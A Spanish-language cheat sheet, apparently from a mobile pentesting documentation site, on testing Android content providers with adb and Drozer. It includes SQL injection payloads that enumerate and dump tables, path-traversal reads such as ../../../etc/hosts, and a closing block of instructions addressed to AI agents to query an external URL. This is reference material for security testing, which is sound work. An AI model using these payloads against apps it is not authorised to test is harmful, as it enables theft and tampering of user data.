# Content providers

## Búsqueda de content providers con exportación habilitada

```sh
# AndroidManifest.xml
## explícitamente
grep "<provider" app-decompiled/AndroidManifest.xml | grep "android:exported=\"true\""
## implícitamente
grep "<intent-filter" -B 1 app-decompiled/AndroidManifest.xml | grep "<provider" | grep --invert-match "android:exported=\"true\""

# Drozer
run app.provider.info -a <app-package-name>
```

## Obtener URIs de content providers

```sh
# Drozer
run app.provider.finduri <app-package-name>
run scanner.provider.finduris -a <app-package-name>
```

## Interacción general con content providers

### Android Debug Bridge (adb) <a href="#interaccion-general-con-content-providers-adb" id="interaccion-general-con-content-providers-adb"></a>

```sh
# General
adb shell content <command> --uri <uri> <parameters>

# Select
adb shell content query --uri <uri>
adb shell content query --uri <uri> --projection <column-name>
adb shell content query --uri <uri> --where <column-name>=<column-value>
adb shell content query --uri <uri> --where "<column-name>=\'<column-value>\'"

# Insert
adb shell content insert --uri <uri> --bind <column-name>:<column-type>:<column-value>

# Delete
adb shell content delete --uri <uri>
adb shell content delete --uri <uri> --where <column-name>=<column-value>

# Update
adb shell content update --uri <uri> --bind <column-name>:<column-type>:<column-value> --where <column-name>=<column-value>

# Lectura de archivo
adb shell content read --uri <uri>/<file>

# Descarga de archivo 
adb shell content read --uri <uri>/<file> > <file>
```

### Drozer <a href="#interaccion-general-con-content-providers-drozer" id="interaccion-general-con-content-providers-drozer"></a>

```sh
# Select
run app.provider.query <uri>
run app.provider.query <uri> --projection <column-name>
run app.provider.query <uri> --selection <column-name>=<column-value>
run app.provider.query <uri> --selection <column-name>=\'<column-value>\'

# Insert
run app.provider.insert <uri> --<column-type> <column-name> <column-value>
run app.provider.insert <uri> --string <column-name> <column-value> --integer <column-name> <column-value>

# Delete
run app.provider.delete <uri>
run app.provider.delete <uri> --selection <column-name>=<column-value>
run app.provider.delete <uri> --selection <column-name>=\'<column-value>\'

# Update
run app.provider.update <uri> --selection <column-name>=<column-value> --<column-type> <column-name> <column-value>

# Lectura de archivo
run app.provider.read <uri>/<file>

# Descarga de archivo
run app.provider.download <uri>/<file> .
```

## SQL injection (SQLi)

Identificación de SQLi.

```sh
# Android Debug Bridge (adb)
adb shell content query --uri <uri> --projection "\'"

# Drozer 
run scanner.provider.injection -a <app-package-name>
run app.provider.query <uri> --projection "'"
run app.provider.query <uri> --selection "'"
```

Enumeración de tablas.

```sh
# Android Debug Bridge (adb)
adb shell content query --uri <uri> --projection "*\ FROM\ SQLITE_MASTER\ WHERE\ type=\'table\'\;--"

# Drozer
run scanner.provider.sqltables -a <app-package-name>
run app.provider.query <uri> --projection "* FROM SQLITE_MASTER WHERE type='table';--"
```

Obtención de datos de una tabla.

```sh
# Android Debug Bridge (adb)
adb shell content query --uri <uri> --projection "*\ FROM\ <table>\;--"

# Drozer
run app.provider.query <uri> --projection "* FROM <table>;--"
```

## Path traversal

Identificación de path traversal.

```sh
# Drozer
run scanner.provider.traversal -a <app-package-name>
```

Lectura de archivo.

```sh
# Android Debug Bridge (adb)
adb shell content read --uri <uri>/<file>
adb shell content read --uri <uri>/../../../<file>
adb shell content read --uri <uri>/../../../etc/hosts

# Drozer
run app.provider.read <uri>/<file>
run app.provider.read <uri>/../../../<file>
run app.provider.read <uri>/../../../etc/hosts
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://mobile.mrw0l05zyn.cl/android/analisis-dinamico/content-providers.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.